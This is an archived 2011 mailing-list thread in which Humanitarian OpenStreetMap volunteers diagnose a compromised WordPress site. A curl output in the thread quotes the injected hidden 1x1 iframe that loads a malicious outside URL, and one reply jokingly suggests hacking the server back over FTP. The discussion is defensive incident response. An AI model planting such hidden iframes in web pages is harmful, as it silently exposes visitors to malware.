[HOT] Malware on hot.openstreetmap.org

Ariel Nunez ingenieroariel at gmail.com
Mon Oct 24 16:23:57 BST 2011


Kate,

If someone could hack it via FTP and add that, perhaps we can hack it to and
remove it.

It actually sounds like fun.

Ariel.

On Mon, Oct 24, 2011 at 2:37 AM, Kate Chapman <kate at maploser.com> wrote:

> Unfortunately there does not appear to be a way I can fix this without
> having access to the actual server.
>
> Any suggestions?  My though is to back-up the blog posts and move it
> to another wordpress instance.  That way then we could switch the DNS
> to the new server.
>
> -Kate
>
> On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville
> <rodolphe at quiedeville.org> wrote:
> > Le 24/10/2011 08:28, Kate Chapman a écrit :
> >> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
> >> missing something.
> >
> > The iframe is not on the /weblog/ pages you can see it when you call the
> > root url like this :
> >
> >
> > rodo at elz:~$ curl hot.openstreetmap.org
> > <html>
> > <head>
> > <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
> > </head>
> > <body><iframe
> > src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
> > width="1" height="1"></iframe>
> > <script type="text/javascript">
> > var gaJsHost = (("https:" == document.location.protocol) ?
> > "https://ssl." : "http://www.");
> > document.write(unescape("%3Cscript src='" + gaJsHost +
> > "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
> > </script>
> > <script type="text/javascript">
> > var pageTracker = _gat._getTracker("UA-5963453-1");
> > pageTracker._trackPageview();
> > </script>
> > </body>
> > </html>
> >
> > Have a look at the beginning of body part
> >
> > It's probably not in the theme part of Wordpress, but somewhere in the
> > config parts of the blog.
> >
> > Regards
> >
> >
> >
> >>
> >> -Kate
> >>
> >> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
> >> <rodolphe at quiedeville.org> wrote:
> >>> Hi,
> >>>
> >>> Someone cracked the Wordpress installed on hot.openstreetmap.org and
> add
> >>> an iframe to :
> >>>
> >>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
> >>>
> >>> Edit the wordpresss template, remove this iframe and it could resolve
> >>> the problem. The security alert occurs on Firefox too.
> >>>
> >>> Regards
> >>>
> >>>
> >>> Le 23/10/2011 23:33, Kate Chapman a écrit :
> >>>> Hi Floris,
> >>>>
> >>>> Yes, I know about the problem but haven't been able to fix it.  I
> think
> >>>> logging into the server might be necessary, but I think only Mikel has
> >>>> access.
> >>>>
> >>>> If anyone has other suggestions please help.
> >>>>
> >>>> Kate
> >>>>
> >>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu
> >>>> <mailto:osm at floris.nu>> wrote:
> >>>>
> >>>>     I'm getting warnings from Chrome at the moment that
> >>>>     hot.openstreetmap.org <http://hot.openstreetmap.org> is infected
> >>>>     with malware.
> >>>>
> >>>>     Anybody want to look into that?
> >>>>
> >>>>     Here's the google diagnose page for it:
> >>>>
> >>>>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
> >>>>     <
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
> >
> >>>>
> >>>>     Greetings,
> >>>>     Floris Looijesteijn
> >>>>
> >>>>     (tracing Van, Turkey)
> >>>>
> >>>>     _______________________________________________
> >>>>     HOT mailing list
> >>>>     HOT at openstreetmap.org <mailto:HOT at openstreetmap.org>
> >>>>     http://lists.openstreetmap.org/listinfo/hot
> >>>>
> >>>>
> >>>>
> >>>> _______________________________________________
> >>>> HOT mailing list
> >>>> HOT at openstreetmap.org
> >>>> http://lists.openstreetmap.org/listinfo/hot
> >>>
> >>>
> >>> --
> >>> Rodolphe Quiédeville
> >>> http://cartosm.eu - Intégration de carte libre sur site web
> >>> Blog : http://blog.rodolphe.quiedeville.org/
> >>> SIP/XMPP : rodolphe at quiedeville.org
> >>>
> >>> _______________________________________________
> >>> HOT mailing list
> >>> HOT at openstreetmap.org
> >>> http://lists.openstreetmap.org/listinfo/hot
> >>>
> >
> >
> > --
> > Rodolphe Quiédeville
> > http://cartosm.eu - Intégration de carte libre sur site web
> > Blog : http://blog.rodolphe.quiedeville.org/
> > SIP/XMPP : rodolphe at quiedeville.org
> >
>
> _______________________________________________
> HOT mailing list
> HOT at openstreetmap.org
> http://lists.openstreetmap.org/listinfo/hot
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openstreetmap.org/pipermail/hot/attachments/20111024/61d68f68/attachment-0001.html>


More information about the HOT mailing list